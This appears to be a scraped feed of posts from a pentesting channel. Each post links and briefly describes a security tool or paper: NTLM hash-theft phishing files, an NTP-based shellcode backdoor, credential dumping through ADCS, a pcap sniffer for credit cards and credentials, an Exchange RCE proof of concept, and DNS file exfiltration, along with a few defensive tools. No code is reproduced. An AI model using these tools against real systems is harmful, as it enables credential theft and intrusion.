FarsightAD

A #PowerShell noscript that aim to help uncovering (eventual) persistence mechanisms deployed by a threat actor following an Active Directory domain compromise.

The noscript produces CSV / JSON file exports of various objects and their attributes, enriched with timestamps from replication metadata. Additionally, if executed with replication privileges, the Directory Replication Service (DRS) protocol is leveraged to detect fully or partially hidden objects.

https://github.com/Qazeer/FarsightAD
#ad
@NetPentesters

ntlm_theft

A tool for generating multiple types of NTLMv2 hash theft files.
ntlm_theft is an Open Source Python3 Tool that generates 21 different types of hash theft documents. These can be used for phishing when either the target allows smb traffic outside their network, or if you are already inside the internal network.

https://github.com/Greenwolf/ntlm_theft
#NTML
@Netpentesters

​​Sandman

Sandman is a backdoor that meant to work on hardened networks during red team engagements.

Sandman works as a stager and leverages NTP (protocol to sync time & date) to download an arbitrary shellcode from a pre defined server.

Since NTP is a protocol that is overlooked by many defenders resulting wide network accessability.

https://github.com/Idov31/Sandman
#redteam
@Netpentesters

​​Warbird Hook

Using Microsoft WARBIRD to automatically unpack and execute encrypted shellcode in ClipSp.sys without triggering PatchGuard.

https://github.com/KiFilterFiberContext/warbird-hook
@Netpentesters

⭐️ Privileger

Privilger allows you to work with privileges in Windows as easily as possible. There are three modes:

— Add privileges to an account;
— Start a process by adding a specific privilege to its token;
— Remove privilege from the user.

Thanks to:
@Michaelzhm

https://github.com/MzHmO/Privileger

#ad #windows #privilege #lsa
@netpentesters

Friends, if you have an idea to improve the channel, share it with us.
@ChatNPTbot

​​Clouditor Community Edition

Clouditor is a tool which supports continuous cloud assurance. Its main goal is to continuously evaluate if a cloud-based application (built using, e.g., Amazon Web Services (AWS) or Microsoft Azure) is configured in a secure way and thus complies with security requirements defined by, e.g., Cloud Computing Compliance Controls Catalogue (C5) issued by the German Office for Information Security (BSI) or the Cloud Control Matrix (CCM) published by the Cloud Security Alliance (CSA).

https://github.com/clouditor/clouditor
#azure #aws
@netpentesters

​​Masky

A python library providing an alternative way to remotely dump domain users' credentials thanks to an ADCS. A command line tool has been built on top of this library in order to easily gather PFX, NT hashes and TGT on a larger scope.

This tool does not exploit any new vulnerability and does not work by dumping the LSASS process memory. Indeed, it only takes advantage of legitimate Windows and Active Directory features (token impersonation, certificate authentication via kerberos & NT hashes retrieval via PKINIT).

A blog post was published to detail the implemented technics and how Masky works.

https://github.com/Z4kSec/Masky

#ad #adcs #lsass #redteam
@Netpentesters

extracting NTLMv2 hashes from a network traffic dump

https://github.com/mlgualtieri/NTLMRawUnHide
#ntlm #pcap
@Netpentesters

"The Proxy Era of Microsoft Exchange Server", 2021.
#Exchange_server
@Netpentesters

Systematization of attacks on the perimeter of L2/L3 network equipment. Ver. 3.0.

V 2.0
#Analytics
#attack
@netpentesters

Network Pentesting Mind Map
#Pentest
@Netpentesters

Active Directory ACEs abuse mindmap

#pentest #redteam #ad #mindmap
@Netpentesters

How To Identify A Company’s Domains With Azure AD

https://nixintel.info/osint-tools/how-to-identify-a-companys-domains-with-azure-ad/

#OSINT
@NetPentesters

Network attack and defense
https://github.com/Seanxz401/seed-labs

#Lab
@NetPentesters

Exchange TabShell RCE PoC (CVE-2022-41076)

+ Microsoft #Exchange: OWASSRF + TabShell (CVE-2022-41076)

The TabShell vulnerability its a form of #Privilege Escalation which allows breaking out of the restricted #Powershell #Sandbox after you have successfully gained access through OWASSRF.

https://gist.github.com/testanull/518871a2e2057caa2bc9c6ae6634103e

Details:
https://blog.viettelcybersecurity.com/tabshell-owassrf/

#Exchange
#ssrf
#tabshell
#poc
@NetPentesters

#Whitepaper
"Timeroasting, Trustroasting and Computer Spraying: Taking advantage of weak computer and trust account passwords in Active Directory".

]-> Timeroasting noscripts:
https://github.com/SecuraBV/Timeroast

#AD
@NetPentesters

[CVE49] Microsoft Windows LNK Remote Code Execution Vulnerability - CVE-2020-1299

File Explorer, previously known as Windows Explorer, is a file manager application that has been included with releases of the Microsoft Windows operating system from Windows 95 onwards. It provides a graphical user interface for accessing the file systems. It is also the component of the operating system that presents many user interface items on the screen such as the taskbar and desktop.

Explorer has a lot of features, each version of the operating system has been upgraded it by Microsoft. Here I discovered that the Explorer will automatically parsing the LNK file if the LNK file appears in the context that the Explorer is accessing. For example, if we are on the desktop, the Explorer will parse the LNK files that appear on the desktop and maybe in some secondary directory (about the depth of the folder that the Explorer can access, I don't know).

https://blog.vincss.net/2020/06/cve49-microsoft-windows-lnk-remote-code-execution-vuln-cve-2020-1299-eng.html?m=1

@NetPentesters

pfSense as an OpenVPN client for specific devices

One of the most powerful features of pfSense is it’s ability to direct your data requests through different end-points using NAT rules. pfSense is amazing as an OpenVPN client because it can selectively route any device on the network through the VPN service (i.e., my tablets and TV go through US servers, while my smartphone, VoIP, computers go my local ISP).
This setup becomes extremely handy for use with applications which are not aware of OpenVPN protocol, eg. download managers, torrent clients, etc. Expecting privacy you should be positive that traffic won't go through your ISP's gateway in case of failure on side of VPN provider. And obviously OpenVPN client should automatically reconnect as soon as service goes live again.
https://gist.github.com/InQuize/59e7c458c510ae779743
#Pfsense
@Netpentesters

This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.

https://github.com/lgandx/PCredz
#pcap
#credential
#sniffer
@Netpentesters

Have you ever wanted to transfer files over DNS A records? No? Well too bad lol, I've updated @domchell's PowerDNS to do that along with some other things. Could be useful for pentests with no standard outbound access... which yes I get quite a bit of.
https://github.com/icyguider/NewPowerDNS
#DNS
@NetPentesters